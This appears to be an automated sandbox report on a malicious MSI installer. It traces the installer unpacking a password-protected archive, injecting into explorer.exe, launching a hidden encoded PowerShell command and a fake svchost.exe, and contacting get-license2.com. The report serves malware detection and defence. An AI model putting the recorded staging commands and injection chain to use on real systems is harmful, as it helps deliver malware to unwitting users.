PID 2276 wrote to memory of 2932 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2276 wrote to memory of 2528 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 2276 wrote to memory of 2528 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 2276 wrote to memory of 1492 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe
PID 2276 wrote to memory of 1492 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe
PID 1492 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 1492 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 1492 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 1492 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 2844 wrote to memory of 1824 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1824 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 4980 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\zQ6y7W1swWaYu86\svchost.exe
PID 2844 wrote to memory of 4980 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\zQ6y7W1swWaYu86\svchost.exe
PID 4980 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\zQ6y7W1swWaYu86\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4980 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\zQ6y7W1swWaYu86\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4980 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\zQ6y7W1swWaYu86\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4980 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\zQ6y7W1swWaYu86\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4980 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\zQ6y7W1swWaYu86\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 7757EDA75F6D1EC599D8A488278B2B1F

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe

"C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe" x -p2161183588a "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\nijboq.rar" "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\"

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe

"C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e 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

C:\Users\Admin\AppData\Local\Temp\zQ6y7W1swWaYu86\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\zQ6y7W1swWaYu86\svchost.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Network

Files

C:\Windows\Installer\MSIBE7D.tmp

C:\Windows\Installer\MSIC160.tmp

C:\Windows\Installer\MSID808.tmp

C:\Config.Msi\e57bd86.rbs

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\nijboq.rar

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe

C:\Windows\Installer\e57bd83.msi

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnp.dll

memory/1492-158-0x000002A14A320000-0x000002A14A321000-memory.dmp

memory/1492-163-0x000002A14A2E0000-0x000002A14A305000-memory.dmp

memory/2844-164-0x00000000007B0000-0x00000000007D8000-memory.dmp

memory/2844-165-0x00000000007B0000-0x00000000007D8000-memory.dmp

memory/2844-166-0x00000000007B0000-0x00000000007D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pfsnsk4v.5sw.ps1

memory/1824-173-0x0000018520230000-0x0000018520252000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\zQ6y7W1swWaYu86\svchost.exe

memory/2844-198-0x00000000007B0000-0x00000000007D8000-memory.dmp

memory/1824-199-0x0000018520730000-0x000001852074C000-memory.dmp

memory/1824-234-0x0000018520920000-0x0000018520AE2000-memory.dmp

memory/1824-235-0x0000018521020000-0x0000018521548000-memory.dmp

memory/2844-236-0x00000000007B0000-0x00000000007D8000-memory.dmp

memory/2604-245-0x0000000000F80000-0x0000000000FD7000-memory.dmp

memory/2604-247-0x0000000000F80000-0x0000000000FD7000-memory.dmp

memory/4980-246-0x00007FF79C210000-0x00007FF79CB91000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-10 10:22

Reported

2024-07-10 10:29

Platform

win7-20240704-en

Max time kernel

121s

Max time network

163s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\f76b471.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f76b474.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB636.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB7DD.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICF36.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDED1.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76b476.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f76b471.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB51C.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76b474.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB6D3.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICEB8.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1724 wrote to memory of 2392 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1724 wrote to memory of 2392 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1724 wrote to memory of 2392 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1724 wrote to memory of 2392 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1724 wrote to memory of 2392 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1724 wrote to memory of 2392 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1724 wrote to memory of 2392 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1724 wrote to memory of 2680 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 1724 wrote to memory of 2680 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 1724 wrote to memory of 2680 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 1724 wrote to memory of 2160 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe
PID 1724 wrote to memory of 2160 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe
PID 1724 wrote to memory of 2160 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 57B2DB4924C4A3BA1BAADC1717A4C9FC

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe

"C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe" x -p2161183588a "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\nijboq.rar" "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\"

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe

"C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 get-license2.com udp
US 104.21.17.66:443 get-license2.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp

Files

C:\Windows\Installer\MSIB51C.tmp

C:\Windows\Installer\MSIB6D3.tmp

C:\Windows\Installer\MSICF36.tmp

\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\java.exe

C:\Config.Msi\f76b475.rbs

\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\nijboq.rar

\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe

C:\Windows\Installer\f76b471.msi

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnp.dll
